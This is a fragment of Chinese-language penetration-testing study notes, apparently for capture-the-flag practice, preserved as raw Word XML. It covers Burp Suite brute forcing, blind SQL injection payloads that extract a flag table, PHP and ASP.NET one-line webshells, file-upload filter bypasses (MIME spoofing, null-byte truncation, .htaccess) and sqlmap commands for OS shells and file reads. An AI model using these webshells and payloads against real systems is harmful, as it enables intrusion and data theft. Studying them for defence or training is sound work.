      <w:bookmarkEnd w:id="6"/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扫描：在目标输入IP地址进行简单扫描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39085"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10795"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕截图 2023-06-19 16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06-19 1640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配置-编辑选中配置可以更改扫描配置，点击保存会自动在主页面命令中生成nmap指令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960370"/>
            <wp:effectExtent l="0" t="0" r="8890" b="11430"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2023-06-19 16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06-19 1646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" w:name="_Toc5811"/>
      <w:bookmarkStart w:id="9" w:name="_Toc4088"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/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0" w:name="_Toc781"/>
      <w:bookmarkStart w:id="11" w:name="_Toc28705"/>
      <w:bookmarkStart w:id="12" w:name="_Toc261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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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代理设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="1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打开软件，设置代理跟目标浏览器一致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21765"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2023-06-19 17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06-19 1748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3" w:name="_Toc12594"/>
      <w:bookmarkStart w:id="14" w:name="_Toc1880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2.爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="1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将Intercept is on开启，这样浏览器访问网址会自动卡主，并在Burp Suite中监听到，之后点击Action-Send to Intruder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728845"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10795"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2023-06-19 17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19 1750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转到Intruder菜单的Positions，得到拦截信息，选中想要转换为payload爆破的地方，点击右侧Add按钮，会把选中项变为参数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41730"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2023-06-19 17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6-19 17570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之后在当前菜单的Payloads中，导入爆破文件，会将文件中所有内容依次作为参数值爆破并显示结果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58440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="屏幕截图 2023-06-19 18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19 18015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点击上面的Filter......可以对结果进行筛选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7075"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2023-06-19 18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19 1805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另外，点击Add from list...这里还有很多现有字典可供使用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3779520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2023-06-19 18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19 18120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SQL注入指令爆破，红色是爆破位置，加粗蓝色为标记位：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查个数：4个数据库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/api?field=(substring((select%20count(schema_name)%20from%20information_schema.schemata),1,1) = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4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第4个数据库第1个字母：c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爆破出数据库为：casdoor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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'casdoo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r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查表1名：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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'applicatio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n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查表2名：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a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'rol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e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查表4名：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'fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>g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查第一列列名：id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查第二列列名：flag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eastAsia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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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查询flag列数据：flag{b}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 group_concat(flag) from flag),§7§,1) = '§a§')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最后一个查询flag数据的时候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第一个变量为1-65个数字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第二个变量为"abcdefghijklmnopqrstuvwxyz0123456789_-!@#$^&amp;*()_+{}[]|\:";',./&lt;&gt;?"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多参数爆破要选择Cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="1936115"/>
            <wp:effectExtent l="0" t="0" r="952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之后Payload Sets也要选择这两个，并且都配置好Payload Options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52725"/>
            <wp:effectExtent l="0" t="0" r="3175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5" w:name="_Toc29475"/>
      <w:bookmarkStart w:id="16" w:name="_Toc20177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3.配合AntSword（中国蚁剑）文件上传</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="1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上传正常图片和一句话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 Burpsuite 的 Proxy-&gt;Intercept 将抓包的状态从关闭改为打开。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20690" cy="3613785"/>
            <wp:effectExtent l="0" t="0" r="11430" b="13335"/>
            <wp:docPr id="36" name="图片 8" descr="IMG_263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6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一句话木马大全：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PHP：&lt;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?php eval($_POST[cc123]) ?&gt;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ASP.net:&lt;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%a=request(“zl”)%&gt;&lt;%eval a%&gt;</w:t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7" w:name="_Toc20093"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（一）文件类型验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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在浏览器上传PHP文件，回到Burpsuite看到MIME信息（Content-type）为text/plain。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0345" cy="4368800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="41" name="图片 9" descr="IMG_264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6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53355" cy="4410710"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="37" name="图片 10" descr="IMG_265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 descr="IMG_26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将Content-type后的内容修改为image/jpg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这样服务器就会认为这是一个图片文件了，接下来关闭抓包按钮，这样就成功的绕过MIME验证。上传成功后，我们需要访问文件，这时可直接复制文件路径（File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6055" cy="4714240"/>
            <wp:effectExtent l="0" t="0" r="6985" b="10160"/>
            <wp:docPr id="42" name="图片 11" descr="IMG_266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 descr="IMG_26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使用AntSword软件打开webshell地址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（也就是一句话木马的POST参数名）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，选择脚本类型为PHP，单击添加按钮，最后我们双击指定条目后的可以看到目标网站的目录，这样我们就成功获取到目标网站的WEBShell权限。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14620" cy="3540125"/>
            <wp:effectExtent l="0" t="0" r="12700" b="10795"/>
            <wp:docPr id="44" name="图片 12" descr="IMG_267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09540" cy="3533140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="32" name="图片 13" descr="IMG_268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8595" cy="3519805"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="38" name="图片 14" descr="IMG_269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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc21667"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（二）内容验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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打开Burpsuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-HTTP history 找到上传图片的数据包，右键 选择Send to Repeater。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54040" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="40" name="图片 2" descr="IMG_257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在末尾加上几个空格后粘贴一句话，然后修改文件名的尾缀为.php利于之后使用中国菜刀进行连接。空格的作用主要用于隔开图片文件和一句话，避免一句话解析混乱。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81015" cy="2881630"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13970"/>
            <wp:docPr id="33" name="图片 3" descr="IMG_258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在图片末尾,添加一句话木马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@eval($_GET['a']);?&gt;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2898140"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12700"/>
            <wp:docPr id="46" name="图片 4" descr="IMG_259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 descr="IMG_2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设置完成之后,（点击Send 发送数据包），上传数据,查看浏览器发现上传成功，复制File Name后面的信息（例如：uploadimg1412865875.php ）。粘贴复制到网站地址后面，从而构造访问地址（例如：http://www.test.comuploadimg1412865875.php ），并复制访问地址。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0505" cy="2623820"/>
            <wp:effectExtent l="0" t="0" r="8255" b="12700"/>
            <wp:docPr id="47" name="图片 5" descr="IMG_260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IMG_2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8125" cy="3589020"/>
            <wp:effectExtent l="0" t="0" r="635" b="7620"/>
            <wp:docPr id="48" name="图片 6" descr="IMG_261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 descr="IMG_2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001645"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="39" name="图片 7" descr="IMG_262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50510" cy="2896870"/>
            <wp:effectExtent l="0" t="0" r="13970" b="13970"/>
            <wp:docPr id="30" name="图片 8" descr="IMG_263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 descr="IMG_2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提示：如果访问构造好的一句话木马地址报错，可能是因为图片内容影响了一句话木马， 也可以在桌面新建php文件。在里面写入两行内容：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GIF89a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直接上传即可。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5900" cy="3100070"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8890"/>
            <wp:docPr id="34" name="图片 9" descr="IMG_264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98135" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
            <wp:docPr id="35" name="图片 10" descr="IMG_265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1455" cy="3402965"/>
            <wp:effectExtent l="0" t="0" r="12065" b="10795"/>
            <wp:docPr id="29" name="图片 11" descr="IMG_266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2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3521075"/>
            <wp:effectExtent l="0" t="0" r="10795" b="14605"/>
            <wp:docPr id="43" name="图片 12" descr="IMG_267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 descr="IMG_2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4155" cy="3111500"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="45" name="图片 13" descr="IMG_268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6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9" w:name="_Toc21861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后缀名验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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php语言除了可以解析以php为后缀的文件，还可以解析php2，php3、php4、php5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、phar、pht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这些后缀的文件。我们可以将文件名修改为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这些后缀依次测试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重新上传。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4315" cy="2564130"/>
            <wp:effectExtent l="0" t="0" r="4445" b="11430"/>
            <wp:docPr id="50" name="图片 1" descr="IMG_256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5105" cy="2860040"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="49" name="图片 2" descr="IMG_257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0815" cy="2866390"/>
            <wp:effectExtent l="0" t="0" r="6985" b="13970"/>
            <wp:docPr id="52" name="图片 3" descr="IMG_258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7800" cy="2887345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="53" name="图片 4" descr="IMG_259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当使用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某个后缀名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20202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5420" cy="2752090"/>
            <wp:effectExtent l="0" t="0" r="7620" b="6350"/>
            <wp:docPr id="54" name="图片 5" descr="IMG_260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IMG_26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7640" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="10160" b="13335"/>
            <wp:docPr id="55" name="图片 6" descr="IMG_261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 descr="IMG_26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右键空白处，点击添加数据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4888230" cy="3273425"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="56" name="图片 7" descr="IMG_262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 descr="IMG_26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3045" cy="3446780"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="51" name="图片 8" descr="IMG_263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 descr="IMG_26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点击添加,成功添加一句话木马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23840" cy="3348990"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
            <wp:docPr id="57" name="图片 9" descr="IMG_264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IMG_26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76520" cy="3357245"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10795"/>
            <wp:docPr id="31" name="图片 10" descr="IMG_265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20" w:name="_Toc29040"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空字节截断目录路径</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20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打开BurpSuite抓包，进行截断浏览器给服务器发送的数据包，Proxy-&gt;Intercept 点击 intercept off 改为intercept on，截断的数据包将在关闭抓包的时候发送给服务端。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61915" cy="2812415"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6985"/>
            <wp:docPr id="64" name="图片 11" descr="IMG_256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点击上传图片抓到包之后，可以看到，filename 后面即是上传的路径，uploading则是保存在服务器上的地址。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568065"/>
            <wp:effectExtent l="0" t="0" r="635" b="13335"/>
            <wp:docPr id="62" name="图片 12" descr="IMG_257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 descr="IMG_25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3835" cy="3355975"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="65" name="图片 13" descr="IMG_258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 descr="IMG_25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将uploadimg改为uploadimg/1.php .jpg ，并选中空格` ,接着我们来到 这个右边，修改code编码，找到同一行的数字20，改为00点击Apply changes`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9390" cy="3032125"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="66" name="图片 14" descr="IMG_259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 descr="IMG_25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20(空格字符的16进制)改成00(截断字符的16进制）这样以来。截断字符后面的都会被截断，也就是忽略掉了，所以uploadimg/1.php .jpg 就变成了uploadimg/1.php 达到了上传PHP文件的目的。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4470" cy="2912110"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13970"/>
            <wp:docPr id="63" name="图片 15" descr="IMG_260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 descr="IMG_26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将数据包中的内容删除，并修改上传内容，将数据包中的内容修改为一句话木马，点击发送Forward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删除前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210" cy="3175000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10160"/>
            <wp:docPr id="74" name="图片 16" descr="IMG_261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 descr="IMG_26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删除后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2804160"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="72" name="图片 17" descr="IMG_262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 descr="IMG_26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修改内容，注意：修改的内容在第二行输入木马才是生效的如图所示：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868930"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="68" name="图片 18" descr="IMG_263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IMG_26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70195" cy="2923540"/>
            <wp:effectExtent l="0" t="0" r="9525" b="2540"/>
            <wp:docPr id="70" name="图片 19" descr="IMG_264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 descr="IMG_26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修改完成后，发送数据包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3675" cy="2904490"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6350"/>
            <wp:docPr id="71" name="图片 20" descr="IMG_265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 descr="IMG_26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返回浏览器，查看发送的数据包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9705" cy="3113405"/>
            <wp:effectExtent l="0" t="0" r="13335" b="10795"/>
            <wp:docPr id="73" name="图片 21" descr="IMG_266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6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可以看到上传成功，地址为uploading/1.php.jpg。复制这段内容uploadimg/1.php并访问，访问成功表示一句话上传成功。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3173730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="11430"/>
            <wp:docPr id="75" name="图片 22" descr="IMG_267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 descr="IMG_26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204210"/>
            <wp:effectExtent l="0" t="0" r="6350" b="11430"/>
            <wp:docPr id="67" name="图片 23" descr="IMG_268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 descr="IMG_26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打开AntSword软件并填入复制的访问地址，填入设定的密码,这里设置的密码是a，选择连接类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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904490"/>
            <wp:effectExtent l="0" t="0" r="5715" b="6350"/>
            <wp:docPr id="69" name="图片 24" descr="IMG_269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 descr="IMG_26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打开中国蚁剑，右键选择添加数据，并将一句话木马地址复制进去。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2085" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270"/>
            <wp:docPr id="60" name="图片 25" descr="IMG_270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 descr="IMG_27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845" cy="3517265"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
            <wp:docPr id="61" name="图片 26" descr="IMG_271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 descr="IMG_27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409315"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="59" name="图片 27" descr="IMG_272">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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 descr="IMG_27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1290" cy="2870835"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="58" name="图片 28" descr="IMG_273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7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最终获取了 Webshell</w:t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21" w:name="_Toc31375"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上传路径验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21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在Burp Suite抓包之后，可以修改上传文件的保存路径来绕过文件上传路径过滤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017135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="77" name="图片 77" descr="屏幕截图 2023-06-23 1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3-06-23 1754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接下来步骤与上面相同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc24292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/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.htaccess文件绕过检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22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编写.htaccess文件。打开记事本，将如下代码写入文本中：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AddType  application/x-httpd-php    .jpg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然后点击文件选中另存为，编写文件名为.htaccess，选择保存类型为所有文件。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27320" cy="3672205"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="8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 descr="IMG_25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300980" cy="3883660"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="9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IMG_25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8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4092575"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="7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 descr="IMG_25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0500" cy="5813425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8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.htaccess文件里的代码的含义 是 将上传的文件后缀名为.jpg格式的文件以 php格式来解析文件。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55260" cy="3542665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="7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 descr="IMG_26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将.htaccess文件进行上传,上传成功。使用BURP 抓包将.htaccess.txt 修改为.htaccess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4310" cy="3653155"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445"/>
            <wp:docPr id="8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6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72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.htaccess是apache服务器中的一个配置文件,不是上传的文件的黑名单之内 ,所以.htaccess文件是可以上传成功。把一句话文件的后缀名为yijuhua.php改为后缀名为jpg格式 。上传成功到服务器的.htaccess文件里的代码可以让 .jpg后缀名文件格式的文件名以 php格式解析 所以我们把yijuhua.php文件的后缀名改为.jpg格式,让.htaccess文件解析 yijuhua.jpg文件里的php代码 ,使木马上传成功。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67325" cy="3233420"/>
            <wp:effectExtent l="0" t="0" r="5715" b="12700"/>
            <wp:docPr id="8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 descr="IMG_26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39385" cy="4692650"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1270"/>
            <wp:docPr id="8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 descr="IMG_26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上传成功之后,复制上传路径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打开桌面AntSword软件并填入复制的访问地址，填入设定的密码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选择脚本类型为PHP，单击添加按钮，最后双击指定条目后的可以看到目标网站的目录，这样就成功获取到目标网站的WEBShell权限。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08270" cy="3329940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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在空白处点击鼠标右键 选择添加。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187950" cy="3733165"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
            <wp:docPr id="9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 descr="IMG_26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访问木马地址,复制链接然后输入上传一句话里文件里设置的密码为 a,选择相应的脚本类型,这里上传的是php脚本 点击添加。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3488690"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270"/>
            <wp:docPr id="8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 descr="IMG_26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双击点击打开地址,连接成功,可以成功看到 uploadimg文件夹下有一个 key文件。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3040" cy="3954780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="8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 descr="IMG_26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右键点击编辑 可以看到字符串 说明一句话木马上传成功。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86375" cy="3601720"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="82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 descr="IMG_27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bookmarkStart w:id="23" w:name="_Toc11388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七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权限限制绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23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将插件放在antSword-master\antData\plugins文件夹下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，这样在请求数据行右键-&gt;加载插件-&gt;绕过disable_functions，即可使用插件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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4647565" cy="3738245"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795"/>
            <wp:docPr id="19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选择对应的模式点击开始即可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27220" cy="4701540"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="19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4" w:name="_Toc994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内容编码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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在Repeater中，可以通过选中修改部分右键-&gt;Convert selection-&gt;URL-&gt;下的选项进行url编码，避免不识别空格等问题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  <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="4116070"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="159" name="图片 159" descr="屏幕截图 2023-08-30 20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屏幕截图 2023-08-30 20052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在爆破的时候，通过Payload Process中Add-&gt;选择加密格式-OK，设置payload字典的编码格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numP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0500" cy="1811655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="1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5" w:name="_Toc2187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请求格式转换</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/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选择Change request method即可，如果是get请求变为post请求，注意传参的Content-Type是否需要修改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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4046220" cy="4351020"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="160" name="图片 160" descr="屏幕截图 2023-08-30 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屏幕截图 2023-08-30 23461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6" w:name="_Toc5718"/>
      <w:bookmarkStart w:id="27" w:name="_Toc23291"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Joomla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="2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查找漏洞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信息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4625340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="76" name="图片 76" descr="屏幕截图 2023-06-24 1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3-06-24 13532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210" w:leftChars="100" w:right="0" w:firstLine="210" w:firstLineChars="10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使用方式：先在cmd运行msfconsole指令，打开msfs后输入search joomla，注意带registration的部分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770" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="1270" b="13335"/>
            <wp:docPr id="83" name="图片 83" descr="屏幕截图 2023-06-24 14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屏幕截图 2023-06-24 14094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输入use 上面白色区域代码，即可打开joomla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733800" cy="396240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="屏幕截图 2023-06-24 14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3-06-24 1413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输入search CVE-2015-7297 查看到一处存在可SQL注入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1403985"/>
            <wp:effectExtent l="0" t="0" r="3810" b="13335"/>
            <wp:docPr id="94" name="图片 94" descr="屏幕截图 2023-06-24 14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3-06-24 14274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8" w:name="_Toc18522"/>
      <w:bookmarkStart w:id="29" w:name="_Toc5942"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="2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在kali中，输入sqlmap -u url地址查看存在GET请求参数的检测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30140" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="屏幕截图 2023-06-24 1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3-06-24 1620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--data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查看存在POST请求参数的检测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23460" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="96" name="图片 96" descr="屏幕截图 2023-06-24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3-06-24 16263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--cookie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查看存在cookie参数的检测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2301240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="图片 97" descr="屏幕截图 2023-06-24 16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3-06-24 16333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获取数据库名称：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--dbs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获取当前所在数据库信息：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--current-db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获取当前数据库所有表信息：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--tables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获取当前数据表所有列信息：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--columns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获取当前表多个数据字段所有数据信息：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--dump -C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列名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（这里会提示是否对其中哈希值进行进一步破解，再之后会提示是否根据字典破解）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获取当前数据库数据量信息：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--count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获取当前用户权限信息：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--privileges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连接数据库：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对数据库SQL执行管理：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--sql-shell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(之后可以进行SQL操作了，比如@@version：查看数据库版本)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延时注入：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-safe-freq或者sqlmap.py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-delay 1（延时1秒）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获取用户：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--os-cmd-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net user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，之后选择网站类型和保存文件位置，分别输入对应数字即可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写Webshell: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 -shell，之后选择语言类型对应数字，之后选择2，之后输入保存文件路径，之后不输入按回车即可得到写Webshell的文件路径，可在浏览器访问，之后输入net user可以查看信息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大小写注入：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--tamper=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randomcase.py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批量检测（这里request的请求集合文件路径可由BurpSuite的Logging功能得到，具体见BurpSuite部分笔记）：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sqlmap.py -l request的请求集合文件路径 --batch -smart（batch：自动选择yes，smart：启发式快速判断，节约时间）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注入显示信息级别：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-v 3（-v后数字从0-6依次显示更多信息）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利用本地burpsuite截取的请求爆库：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文件内容类似：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object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:35pt;width:25.85pt;" o:ole="t" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f"/>
            <v:imagedata r:id="rId158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57">
            <o:LockedField>false</o:LockedField>
          </o:OLEObject>
        </w:objec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爆库（表，字段，内容同理）：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--dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4861560" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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69180" cy="2141220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1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如果存在已知的存在漏洞的参数名，需要改为：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-p 参数名 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2134870"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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3875"/>
            <wp:effectExtent l="0" t="0" r="3810" b="4445"/>
            <wp:docPr id="1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爆flag文件内容：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 -r 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文件名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--file-read "/flag" --dbms mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2236470"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3810"/>
            <wp:docPr id="1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62990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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30" w:name="_Toc7012"/>
      <w:bookmarkStart w:id="31" w:name="_Toc14834"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="3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正向跟踪：搜索request.getParameter、HttpServletRequest、RequestMapping、request.getPart等获取输入数据的地方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2" w:name="_Toc29494"/>
      <w:bookmarkStart w:id="33" w:name="_Toc2090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1.SQL注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="3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利用单引号闭合注入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4" w:name="_Toc5215"/>
      <w:bookmarkStart w:id="35" w:name="_Toc1438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2.命令执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
